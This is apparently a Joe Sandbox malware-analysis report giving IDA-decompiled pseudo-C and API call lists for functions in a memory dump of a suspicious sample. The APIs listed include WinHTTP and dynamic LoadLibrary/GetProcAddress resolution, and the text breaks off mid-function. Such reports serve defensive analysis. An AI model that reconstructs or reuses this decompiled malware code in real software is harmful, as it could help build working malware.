    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CDCD0, Relevance: 10.7, APIs: 7, Instructions: 204
    C-Code - Quality: 60%
    			E003CDCD0(void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				short _v36;
				char _v44;
				intOrPtr _v48;
				char _v248;
				void* __ebx;
				void* _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				intOrPtr* _t84;
				char _t87;
				char _t88;
				char _t89;
				intOrPtr* _t91;
				intOrPtr* _t94;
				void* _t96;
				intOrPtr* _t100;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;
				void* _t115;
				intOrPtr* _t116;
				void* _t117;
				intOrPtr _t131;
				intOrPtr* _t159;
				void* _t161;
				void* _t162;
				void* _t163;

				_v28 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_v32 = 0;
				_v24 = 0;
				_v36 = 0;
				E003CBB30( &_v44);
				_v48 = __ecx + 0x2c;
				E003C3270(_t115, __ecx + 0x2c);
				_t159 = _a4;
				_t69 =  *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x58))))(_t159,  &_v36, __edi, __esi, _t115);
				_t116 = __imp__#6;
				if(_t69 >= 0) {
					if(_v36 != 0xffff) {
						L22:
						_v32 = 1;
					} else {
						_push( &_v24);
						_push(_t159);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x30))))() >= 0) {
							_t84 = _v24;
							_push( &_v28);
							_push(_t84);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t84 + 0x20))))() >= 0) {
								_t161 = 0;
								if(_v28 <= 0) {
									goto L22;
								} else {
									while(1) {
										_t87 = _v20;
										if(_t87 != 0) {
											 *_t116(_t87);
										}
										_t88 = _v12;
										_v20 = 0;
										if(_t88 != 0) {
											 *_t116(_t88);
										}
										_t89 = _v16;
										_v12 = 0;
										if(_t89 != 0) {
											 *_t116(_t89);
										}
										_v16 = 0;
										E003CB1E0(_t116,  &_v44);
										_t91 = _v24;
										_push( &_v8);
										_push(_t161);
										_push(_t91);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x1c))))() < 0) {
											goto L23;
										}
										_t94 = _v8;
										_t96 =  *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0xa4))))(_t94,  &_v20);
										_t174 = _t96;
										if(_t96 >= 0) {
											E003C9090(_t174,  &_v248, 0x25);
											_t131 =  *0x3e8628; // 0x622508
											_t162 = _t162 + 8;
											_push( &_v248);
											_push(_v20);
											if( *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xe0))))() != 0) {
												L21:
												_t100 = _v8;
												 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 8))))(_t100);
												_t161 = _t161 + 1;
												_v8 = 0;
												if(_t161 < _v28) {
													continue;
												} else {
													goto L22;
												}
											} else {
												_t103 = E003CA140( &_v44, _v8);
												_t176 = _t103;
												if(_t103 != 0) {
													E003C9090(_t176,  &_v248, 0x26);
													_t163 = _t162 + 8;
													_t106 = E003C1A10( &_v44,  &_v248,  &_v12);
													_t177 = _t106;
													if(_t106 != 0) {
														E003C9090(_t177,  &_v248, 0x27);
														_t109 = E003C1A10( &_v44,  &_v248,  &_v16);
														_push(0xc);
														L003CA47E();
														_t162 = _t163 + 0xc;
														if(_t109 == 0) {
															_t110 = 0;
															__eflags = 0;
														} else {
															_t110 = E003C2120(_t109, _v12, _v16, 0);
														}
														if(E003D0A50(_v48, _t110) != 0) {
															goto L21;
														}
													}
												}
											}
										}
										goto L23;
									}
								}
							}
						}
					}
				}
				L23:
				_t70 = _v20;
				if(_t70 != 0) {
					 *_t116(_t70);
				}
				_t71 = _v12;
				if(_t71 != 0) {
					 *_t116(_t71);
				}
				_t72 = _v16;
				if(_t72 != 0) {
					 *_t116(_t72);
				}
				_t73 = _v8;
				if(_t73 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 8))))(_t73);
				}
				_t74 = _v24;
				_pop(_t117);
				if(_t74 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t74 + 8))))(_t74);
				}
				L003C26B0(_t117,  &_v44);
				return _v32;
			}









































    0x003cdce3
    0x003cdce6
    0x003cdce9
    0x003cdcec
    0x003cdcef
    0x003cdcf2
    0x003cdcf5
    0x003cdcf8
    0x003cdcfb
    0x003cdd03
    0x003cdd06
    0x003cdd0b
    0x003cdd18
    0x003cdd1a
    0x003cdd22
    0x003cdd2d
    0x003cdeaa
    0x003cdeaa
    0x003cdd33
    0x003cdd3b
    0x003cdd3c
    0x003cdd41
    0x003cdd47
    0x003cdd4f
    0x003cdd50
    0x003cdd58
    0x003cdd5e
    0x003cdd63
    0x00000000
    0x00000000
    0x003cdd70
    0x003cdd70
    0x003cdd75
    0x003cdd78
    0x003cdd78
    0x003cdd7a
    0x003cdd7d
    0x003cdd82
    0x003cdd85
    0x003cdd85
    0x003cdd87
    0x003cdd8a
    0x003cdd8f
    0x003cdd92
    0x003cdd92
    0x003cdd97
    0x003cdd9a
    0x003cdd9f
    0x003cdda7
    0x003cdda8
    0x003cdda9
    0x003cddb1
    0x00000000
    0x00000000
    0x003cddb7
    0x003cddc7
    0x003cddc9
    0x003cddcb
    0x003cddda
    0x003cdde2
    0x003cdde8
    0x003cddf1
    0x003cddf8
    0x003cddfd
    0x003cde92
    0x003cde92
    0x003cde9b
    0x003cde9d
    0x003cde9e
    0x003cdea4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003cde03
    0x003cde0a
    0x003cde0f
    0x003cde11
    0x003cde20
    0x003cde25
    0x003cde36
    0x003cde3b
    0x003cde3d
    0x003cde48
    0x003cde5e
    0x003cde63
    0x003cde65
    0x003cde6a
    0x003cde6f
    0x003cde83
    0x003cde83
    0x003cde71
    0x003cde7c
    0x003cde7c
    0x003cde90
    0x00000000
    0x00000000
    0x003cde90
    0x003cde3d
    0x003cde11
    0x003cddfd
    0x00000000
    0x003cddcb
    0x003cdd70
    0x003cdd63
    0x003cdd58
    0x003cdd41
    0x003cdd2d
    0x003cdeb1
    0x003cdeb1
    0x003cdeb6
    0x003cdeb9
    0x003cdeb9
    0x003cdebb
    0x003cdec0
    0x003cdec3
    0x003cdec3
    0x003cdec5
    0x003cdeca
    0x003cdecd
    0x003cdecd
    0x003cdecf
    0x003cded4
    0x003cdedc
    0x003cdedc
    0x003cdede
    0x003cdee5
    0x003cdee6
    0x003cdeee
    0x003cdeee
    0x003cdef3
    0x003cdefe

    APIs
      • Part of subcall function 003C3270: ??3@YAXPAX@Z.MSVCRT ref: 003C3291
    • SysFreeString.OLEAUT32(?), ref: 003CDD78
    • SysFreeString.OLEAUT32(?), ref: 003CDD85
    • SysFreeString.OLEAUT32(?), ref: 003CDD92
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB1F8
      • Part of subcall function 003CB1E0: SysFreeString.OLEAUT32(?), ref: 003CB201
    • ??2@YAPAXI@Z.MSVCRT ref: 003CDE65
      • Part of subcall function 003D0A50: ??2@YAPAXI@Z.MSVCRT ref: 003D0A7F
      • Part of subcall function 003C2120: SysAllocString.OLEAUT32(00000000), ref: 003C2131
      • Part of subcall function 003C2120: SysAllocString.OLEAUT32(?), ref: 003C2139
    • SysFreeString.OLEAUT32(?), ref: 003CDEB9
    • SysFreeString.OLEAUT32(?), ref: 003CDEC3
    • SysFreeString.OLEAUT32(?), ref: 003CDECD
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003E0DCE, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 94
    APIs
      • Part of subcall function 003E1D30: WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003E1D73
    • ??3@YAXPAX@Z.MSVCRT ref: 003E1082
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003C3E30, Relevance: 9.4, APIs: 6, Instructions: 384
    C-Code - Quality: 72%
    			E003C3E30(intOrPtr __ecx, intOrPtr* _a4) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr _v56;
				short _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v280;
				signed int _t171;
				signed int _t172;
				intOrPtr* _t173;
				intOrPtr* _t174;
				intOrPtr* _t180;
				intOrPtr _t188;
				signed int _t198;
				signed int _t207;
				signed int _t208;
				intOrPtr* _t209;
				intOrPtr* _t212;
				void* _t214;
				intOrPtr* _t218;
				signed int _t220;
				intOrPtr _t227;
				intOrPtr _t229;
				intOrPtr _t230;
				intOrPtr _t231;
				signed int _t234;
				signed int _t236;
				signed int _t242;
				signed int _t244;
				intOrPtr _t267;
				intOrPtr _t271;
				intOrPtr _t274;
				signed int _t276;
				intOrPtr* _t277;
				signed int _t278;
				intOrPtr* _t279;
				intOrPtr* _t293;
				signed int _t304;
				intOrPtr* _t306;
				intOrPtr _t308;
				intOrPtr _t310;
				signed int _t312;
				intOrPtr* _t313;
				void* _t314;
				intOrPtr _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;

				_t306 = _a4;
				_t244 = 0;
				_t310 = __ecx;
				_push( &_v60);
				_push(_t306);
				_v56 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v52 = 0;
				_v40 = 0;
				_v60 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)( *_t306 + 0x58))))() < 0 || _v60 != 0xffff) {
					L62:
					_t171 = _v24;
					if(_t171 != _t244) {
						__imp__#6(_t171);
					}
					_t172 = _v20;
					if(_t172 != _t244) {
						__imp__#6(_t172);
					}
					_t173 = _v16;
					if(_t173 != _t244) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 8))))(_t173);
					}
					_t174 = _v40;
					if(_t174 != _t244) {
						 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 8))))(_t174);
					}
					return _v52;
				} else {
					_push( &_v40);
					_push(_t306);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t306 + 0x30))))() < 0) {
						goto L62;
					}
					_t180 = _v40;
					_push( &_v8);
					_push(_t180);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t180 + 0x20))))() < 0) {
						goto L62;
					}
					_v28 = E003D1D90(_v8 * 4, 0);
					_v32 = E003D1D90(_v8 * 4, 0);
					_t308 = E003D1D90(_v8 * 8, 0);
					_t188 = E003D1D90(_v8 * 8, 0);
					_t318 = _t317 + 0x20;
					_v68 = _t188;
					if(_v28 == 0) {
						L60:
						_t189 = _v32;
						if(_v32 != _t244) {
							E003CBB40(_t189);
						}
						goto L62;
					}
					if(_v32 == 0 || _t308 == 0 || _t188 == 0) {
						L59:
						E003CBB40(_v28);
						_t318 = _t318 + 4;
						goto L60;
					} else {
						if(_v8 <= 0) {
							L46:
							_t192 =  *((intOrPtr*)(_t310 + 0x1c));
							if( *((intOrPtr*)(_t310 + 0x1c)) != 0) {
								E003CBB40(_t192);
								_t318 = _t318 + 4;
							}
							_t193 =  *((intOrPtr*)(_t310 + 0x20));
							if( *((intOrPtr*)(_t310 + 0x20)) != 0) {
								E003CBB40(_t193);
								_t318 = _t318 + 4;
							}
							 *((intOrPtr*)(_t310 + 0x1c)) = E003D1D90(_v8 * 4, 0);
							 *((intOrPtr*)(_t310 + 0x20)) = E003D1D90(_v8 * 4, 0);
							_t198 = 0;
							_t318 = _t318 + 0x10;
							if(_v8 <= 0) {
								L53:
								_t199 =  *((intOrPtr*)(_t310 + 0x24));
								if( *((intOrPtr*)(_t310 + 0x24)) != 0) {
									E003CBB40(_t199);
									_t318 = _t318 + 4;
								}
								_t200 =  *((intOrPtr*)(_t310 + 0x28));
								if( *((intOrPtr*)(_t310 + 0x28)) != 0) {
									E003CBB40(_t200);
									_t318 = _t318 + 4;
								}
								 *((intOrPtr*)(_t310 + 0x24)) = _t308;
								 *((intOrPtr*)(_t310 + 0x28)) = _v68;
								 *((intOrPtr*)(_t310 + 0x18)) = _v8;
								_v52 = 1;
								L58:
								_t244 = 0;
								goto L59;
							} else {
								do {
									 *((intOrPtr*)( *((intOrPtr*)(_t310 + 0x1c)) + _t198 * 4)) =  *((intOrPtr*)(_v28 +  *(_t308 + _t198 * 8) * 4));
									 *((intOrPtr*)( *((intOrPtr*)(_t310 + 0x20)) + _t198 * 4)) =  *((intOrPtr*)(_v32 +  *(_t308 + _t198 * 8) * 4));
									 *(_t308 + _t198 * 8) = 0;
									 *(_t308 + 4 + _t198 * 8) = 0;
									_t198 = _t198 + 1;
								} while (_t198 < _v8);
								goto L53;
							}
						}
						_t293 = _v28;
						_a4 = _t308;
						_v48 = _t293;
						_v64 = _v32 - _t293;
						_v80 = _t188 - _t308;
						while(1) {
							_t207 = _v20;
							if(_t207 != 0) {
								__imp__#6(_t207);
							}
							_t208 = _v24;
							_v20 = 0;
							if(_t208 != 0) {
								__imp__#6(_t208);
							}
							_t209 = _v40;
							_push( &_v16);
							_v24 = 0;
							_push(_t244);
							_push(_t209);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t209 + 0x1c))))() < 0) {
								goto L58;
							}
							_t212 = _v16;
							_t214 =  *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0xa4))))(_t212,  &_v24);
							_t334 = _t214;
							if(_t214 < 0) {
								goto L58;
							}
							E003C9090(_t334,  &_v280, 0x28);
							_t267 =  *0x3e8628; // 0x622508
							_t318 = _t318 + 8;
							_push( &_v280);
							_push(_v24);
							if( *((intOrPtr*)( *((intOrPtr*)(_t267 + 0xe0))))() != 0) {
								L45:
								_t218 = _v16;
								 *((intOrPtr*)( *((intOrPtr*)( *_t218 + 8))))(_t218);
								_v48 = _v48 + 4;
								_a4 = _a4 + 8;
								_t244 = _t244 + 1;
								_v16 = 0;
								if(_t244 < _v8) {
									continue;
								}
								goto L46;
							}
							_t220 = _v16;
							_push( &_v20);
							_push(_t220);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t220 + 0x68))))() < 0) {
								goto L58;
							}
							_t312 = E003C7B80(_v20, 0x3e330c,  &_v12, 2);
							_t320 = _t318 + 0x10;
							if(_t312 != 2) {
								__eflags = _t312;
								if(_t312 <= 0) {
									L73:
									E003CBB40(_v12);
									_t318 = _t320 + 4;
									goto L58;
								} else {
									goto L72;
								}
								do {
									L72:
									_t271 =  *((intOrPtr*)(_v12 + _t312 * 4 - 4));
									_t312 = _t312 - 1;
									E003CBB40(_t271);
									_t320 = _t320 + 4;
									__eflags = _t312;
								} while (_t312 > 0);
								goto L73;
							}
							_t227 = _v12;
							__imp___wtoi( *((intOrPtr*)(_t227 + 4)));
							_t313 = _v48;
							 *((intOrPtr*)(_v64 + _t313)) = _t227;
							_t229 = E003C66C0( *_v12);
							_t274 = _v80;
							 *_t313 = _t229;
							_t230 = _a4;
							_t321 = _t320 + 8;
							 *(_t274 + _t230) = 0;
							 *(_t274 + _t230 + 4) = 0;
							_t314 = 8;
							do {
								_t231 =  *((intOrPtr*)(_t314 + _v12 - 4));
								_t314 = _t314 - 4;
								E003CBB40(_t231);
								_t321 = _t321 + 4;
							} while (_t314 > 0);
							E003CBB40(_v12);
							_t318 = _t321 + 4;
							_v44 = 0;
							do {
								_t234 = rand();
								asm("cdq");
								_t304 = _t234 % _v8;
								_t276 = 0;
								_t236 = _t304;
								_v36 = _t236;
								if(_t244 <= 0) {
									L27:
									if(_t276 == _t244) {
										_t277 = _a4;
										asm("cdq");
										 *_t277 = _v36;
										 *(_t277 + 4) = _t304;
										L31:
										if(_v44 != 0x3e8) {
											L44:
											_t310 = _v56;
											goto L45;
										}
										_t316 = _v36 + 1;
										if(_t316 == _v36) {
											goto L44;
										} else {
											goto L33;
										}
										do {
											L33:
											if(_t316 == _v8) {
												_t316 = 0;
											}
											_t278 = 0;
											if(_t244 <= 0) {
												L40:
												if(_t278 == _t244) {
													_t279 = _a4;
													asm("cdq");
													 *_t279 = _t316;
													 *(_t279 + 4) = _t304;
													goto L44;
												}
											} else {
												asm("cdq");
												_v76 = _t316;
												_v72 = _t304;
												while(1) {
													_t304 =  *(_t308 + _t278 * 8);
													if(_t304 == _v76 &&  *((intOrPtr*)(_t308 + 4 + _t278 * 8)) == _v72) {
														goto L40;
													}
													_t278 = _t278 + 1;
													if(_t278 < _t244) {
														continue;
													}
													goto L40;
												}
												goto L40;
											}
											_t316 = _t316 + 1;
										} while (_t316 != _v36);
										goto L44;
									}
									goto L28;
								}
								asm("cdq");
								while( *((intOrPtr*)(_t308 + _t276 * 8)) != _t236 ||  *((intOrPtr*)(_t308 + 4 + _t276 * 8)) != _t304) {
									_t276 = _t276 + 1;
									if(_t276 < _t244) {
										continue;
									}
									goto L27;
								}
								goto L27;
								L28:
								_t242 = _v44 + 1;
								_v44 = _t242;
							} while (_t242 < 0x3e8);
							goto L31;
						}
						goto L58;
					}
				}
			}

































































    0x003c3e3c
    0x003c3e44
    0x003c3e46
    0x003c3e4b
    0x003c3e4c
    0x003c3e4d
    0x003c3e50
    0x003c3e53
    0x003c3e56
    0x003c3e59
    0x003c3e5c
    0x003c3e5f
    0x003c3e62
    0x003c3e65
    0x003c3e6c
    0x003c4227
    0x003c4227
    0x003c422c
    0x003c422f
    0x003c422f
    0x003c4235
    0x003c423a
    0x003c423d
    0x003c423d
    0x003c4243
    0x003c4248
    0x003c4250
    0x003c4250
    0x003c4252
    0x003c425a
    0x003c4262
    0x003c4262
    0x003c426a
    0x003c3e7d
    0x003c3e85
    0x003c3e86
    0x003c3e8b
    0x00000000
    0x00000000
    0x003c3e91
    0x003c3e99
    0x003c3e9a
    0x003c3ea2
    0x00000000
    0x00000000
    0x003c3eb9
    0x003c3ed0
    0x003c3eed
    0x003c3eef
    0x003c3ef4
    0x003c3ef7
    0x003c3efd
    0x003c4217
    0x003c4217
    0x003c421c
    0x003c421f
    0x003c4224
    0x00000000
    0x003c421c
    0x003c3f06
    0x003c420b
    0x003c420f
    0x003c4214
    0x00000000
    0x003c3f1c
    0x003c3f1f
    0x003c4144
    0x003c4144
    0x003c4149
    0x003c414c
    0x003c4151
    0x003c4151
    0x003c4154
    0x003c4159
    0x003c415c
    0x003c4161
    0x003c4161
    0x003c4179
    0x003c418b
    0x003c418e
    0x003c4190
    0x003c4196
    0x003c41d3
    0x003c41d3
    0x003c41d8
    0x003c41db
    0x003c41e0
    0x003c41e0
    0x003c41e3
    0x003c41e8
    0x003c41eb
    0x003c41f0
    0x003c41f0
    0x003c41f9
    0x003c41fc
    0x003c41ff
    0x003c4202
    0x003c4209
    0x003c4209
    0x00000000
    0x003c4198
    0x003c41a0
    0x003c41af
    0x003c41bb
    0x003c41be
    0x003c41c5
    0x003c41cd
    0x003c41ce
    0x00000000
    0x003c41a0
    0x003c4196
    0x003c3f25
    0x003c3f2f
    0x003c3f32
    0x003c3f35
    0x003c3f38
    0x003c3f40
    0x003c3f40
    0x003c3f45
    0x003c3f48
    0x003c3f48
    0x003c3f4e
    0x003c3f51
    0x003c3f5a
    0x003c3f5d
    0x003c3f5d
    0x003c3f63
    0x003c3f69
    0x003c3f6a
    0x003c3f73
    0x003c3f74
    0x003c3f7c
    0x00000000
    0x00000000
    0x003c3f82
    0x003c3f92
    0x003c3f94
    0x003c3f96
    0x00000000
    0x00000000
    0x003c3fa5
    0x003c3fad
    0x003c3fb3
    0x003c3fbc
    0x003c3fc3
    0x003c3fc8
    0x003c4120
    0x003c4120
    0x003c4129
    0x003c412b
    0x003c412f
    0x003c4133
    0x003c4134
    0x003c413e
    0x00000000
    0x00000000
    0x00000000
    0x003c413e
    0x003c3fce
    0x003c3fd6
    0x003c3fd7
    0x003c3fdf
    0x00000000
    0x00000000
    0x003c3ff9
    0x003c3ffb
    0x003c4001
    0x003c426d
    0x003c426f
    0x003c4286
    0x003c428a
    0x003c428f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003c4271
    0x003c4271
    0x003c4274
    0x003c4278
    0x003c427a
    0x003c427f
    0x003c4282
    0x003c4282
    0x00000000
    0x003c4271
    0x003c4007
    0x003c400e
    0x003c4017
    0x003c401a
    0x003c4023
    0x003c4028
    0x003c402b
    0x003c402d
    0x003c4030
    0x003c4033
    0x003c403a
    0x003c4042
    0x003c4050
    0x003c4053
    0x003c4057
    0x003c405b
    0x003c4060
    0x003c4063
    0x003c406b
    0x003c4070
    0x003c4073
    0x003c4080
    0x003c4080
    0x003c4086
    0x003c4087
    0x003c408a
    0x003c408c
    0x003c408e
    0x003c4093
    0x003c40a6
    0x003c40a8
    0x003c40bd
    0x003c40c0
    0x003c40c1
    0x003c40c3
    0x003c40c6
    0x003c40cd
    0x003c411d
    0x003c411d
    0x00000000
    0x003c411d
    0x003c40d2
    0x003c40d6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003c40d8
    0x003c40d8
    0x003c40db
    0x003c40dd
    0x003c40dd
    0x003c40df
    0x003c40e3
    0x003c4106
    0x003c4108
    0x003c4112
    0x003c4117
    0x003c4118
    0x003c411a
    0x00000000
    0x003c411a
    0x003c40e5
    0x003c40e7
    0x003c40e8
    0x003c40eb
    0x003c40f0
    0x003c40f0
    0x003c40f6
    0x00000000
    0x00000000
    0x003c4101
    0x003c4104
    0x00000000
    0x00000000
    0x00000000
    0x003c4104
    0x00000000
    0x003c40f0
    0x003c410a
    0x003c410b
    0x00000000
    0x003c4110
    0x00000000
    0x003c40a8
    0x003c4095
    0x003c4096
    0x003c40a1
    0x003c40a4
    0x00000000
    0x00000000
    0x00000000
    0x003c40a4
    0x00000000
    0x003c40aa
    0x003c40ad
    0x003c40ae
    0x003c40b1
    0x00000000
    0x003c40b8
    0x00000000
    0x003c3f40
    0x003c3f06

    APIs
    • SysFreeString.OLEAUT32(?), ref: 003C3F48
    • SysFreeString.OLEAUT32(?), ref: 003C3F5D
    • _wtoi.MSVCRT ref: 003C400E
    • rand.MSVCRT ref: 003C4080
      • Part of subcall function 003CBB40: HeapFree.KERNEL32(00160000,00000008,003D04E6), ref: 003CBB53
    • SysFreeString.OLEAUT32(?), ref: 003C422F
    • SysFreeString.OLEAUT32(?), ref: 003C423D
      • Part of subcall function 003D1D90: LoadLibraryA.KERNEL32(?), ref: 003D1DB7
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DD8
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1DFE
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E1C
      • Part of subcall function 003D1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003D1E3A
      • Part of subcall function 003D1D90: GetProcessHeap.KERNEL32 ref: 003D1E45
      • Part of subcall function 003D1D90: RtlReAllocateHeap.NTDLL(00160000,00000008,?,003D042E), ref: 003D1E5F
      • Part of subcall function 003D1D90: RtlAllocateHeap.NTDLL(00160000,00000008,003D042E), ref: 003D1E72
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CBF60, Relevance: 9.3, APIs: 6, Instructions: 336
    C-Code - Quality: 71%
    			E003CBF60(intOrPtr __ecx, signed int* _a4) {
				signed int _v8;
				void* _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				signed int _v36;
				short _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v256;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr* _t130;
				intOrPtr* _t131;
				intOrPtr* _t137;
				signed int* _t144;
				intOrPtr _t148;
				intOrPtr _t156;
				signed int _t157;
				char _t163;
				char _t164;
				intOrPtr* _t165;
				intOrPtr* _t168;
				void* _t170;
				intOrPtr* _t174;
				intOrPtr* _t176;
				intOrPtr _t183;
				signed int _t189;
				signed int _t191;
				signed int _t192;
				signed int* _t194;
				signed int _t205;
				intOrPtr _t212;
				signed int _t220;
				intOrPtr _t242;
				signed int _t243;
				signed int _t246;
				intOrPtr _t248;
				intOrPtr* _t250;
				intOrPtr _t252;
				signed int _t255;
				intOrPtr* _t257;
				void* _t258;
				void* _t259;
				void* _t260;
				void* _t261;
				void* _t263;
				void* _t264;

				_t250 = _a4;
				_t246 = 0;
				_v52 = __ecx;
				_push( &_v40);
				_push(_t250);
				_v8 = 0;
				_v20 = 0;
				_v24 = 0;
				_v12 = 0;
				_v16 = 0;
				_v36 = 0;
				_v28 = 0;
				_v40 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x58))))() >= 0 && _v40 == 0xffff) {
					_push( &_v28);
					_push(_t250);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x30))))() >= 0) {
						_t137 = _v28;
						_push( &_v8);
						_push(_t137);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t137 + 0x20))))() >= 0) {
							_t252 = E003D1D90(_v8 * 4, 0);
							_v44 = _t252;
							_v32 = E003D1D90(_v8 * 4, 0);
							_t144 = E003D1D90(_v8 * 8, 0);
							_t261 = _t260 + 0x18;
							_t194 = _t144;
							if(_t252 != 0) {
								_t148 = _v32;
								if(_t148 != 0) {
									if(_v8 <= 0) {
										L41:
										_t248 = _v52;
										_t151 =  *((intOrPtr*)(_t248 + 0x1c));
										if( *((intOrPtr*)(_t248 + 0x1c)) != 0) {
											E003CBB40(_t151);
											_t261 = _t261 + 4;
										}
										_t152 =  *((intOrPtr*)(_t248 + 0x20));
										if( *((intOrPtr*)(_t248 + 0x20)) != 0) {
											E003CBB40(_t152);
											_t261 = _t261 + 4;
										}
										 *((intOrPtr*)(_t248 + 0x1c)) = E003D1D90(_v8 * 4, 0);
										_t156 = E003D1D90(_v8 * 4, 0);
										_t205 = _v8;
										 *((intOrPtr*)(_t248 + 0x20)) = _t156;
										_t261 = _t261 + 0x10;
										_t157 = 0;
										if(_t205 > 0) {
											do {
												 *((intOrPtr*)( *((intOrPtr*)(_t248 + 0x1c)) + _t157 * 4)) =  *((intOrPtr*)(_v44 +  *(_t194 + _t157 * 4) * 4));
												 *((intOrPtr*)( *((intOrPtr*)(_t248 + 0x20)) + _t157 * 4)) =  *((intOrPtr*)(_v32 +  *(_t194 + _t157 * 4) * 4));
												_t205 = _v8;
												_t157 = _t157 + 1;
											} while (_t157 < _t205);
										}
										 *((intOrPtr*)(_t248 + 0x18)) = _t205;
										 *((intOrPtr*)(_t248 + 0x24)) = 0;
										_v36 = 1;
									} else {
										_v56 = _t148 - _t252;
										_a4 = _t194;
										_v48 = _t252 - _t194;
										while(1) {
											_t163 = _v20;
											if(_t163 != 0) {
												__imp__#6(_t163);
											}
											_t164 = _v24;
											_v20 = 0;
											if(_t164 != 0) {
												__imp__#6(_t164);
											}
											_t165 = _v28;
											_push( &_v16);
											_v24 = 0;
											_push(_t246);
											_push(_t165);
											if( *((intOrPtr*)( *((intOrPtr*)( *_t165 + 0x1c))))() < 0) {
												goto L48;
											}
											_t168 = _v16;
											_t170 =  *((intOrPtr*)( *((intOrPtr*)( *_t168 + 0xa4))))(_t168,  &_v24);
											_t276 = _t170;
											if(_t170 >= 0) {
												E003C9090(_t276,  &_v256, 0x48);
												_t212 =  *0x3e8628; // 0x622508
												_t261 = _t261 + 8;
												_push( &_v256);
												_push(_v24);
												if( *((intOrPtr*)( *((intOrPtr*)(_t212 + 0xe0))))() != 0) {
													L40:
													_t174 = _v16;
													 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 8))))(_t174);
													_a4 =  &(_a4[1]);
